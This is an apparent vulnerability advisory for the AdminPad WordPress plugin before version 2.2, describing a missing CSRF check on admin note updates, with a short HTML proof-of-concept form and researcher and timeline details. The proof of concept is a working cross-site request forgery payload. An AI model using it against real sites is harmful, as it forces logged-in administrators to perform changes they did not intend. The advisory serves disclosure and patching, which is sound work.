WordPress Plugin Vulnerabilities

AdminPad < 2.2 - Note Update via CSRF

Description

The plugin does not have CSRF check when updating admin's note, allowing attackers to make a logged in admin update their notes via a CSRF attack

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/index.php" method="POST">
      <input type="hidden" name="adminpad_content" value="test" />
      <input type="hidden" name="adminpad_save" value="true" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Notes are displayed in the Dashboard (/wp-admin/index.php)

Affects Plugins

Fixed in 2.2

References

Classification

Miscellaneous

Original Researcher
Raad Haddad of Cloudyrion GmbH
Submitter
Raad Haddad of Cloudyrion GmbH
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2022-09-29 (about 1 years ago)
Added
2022-09-29 (about 1 years ago)
Last Updated
2022-09-29 (about 1 years ago)

Other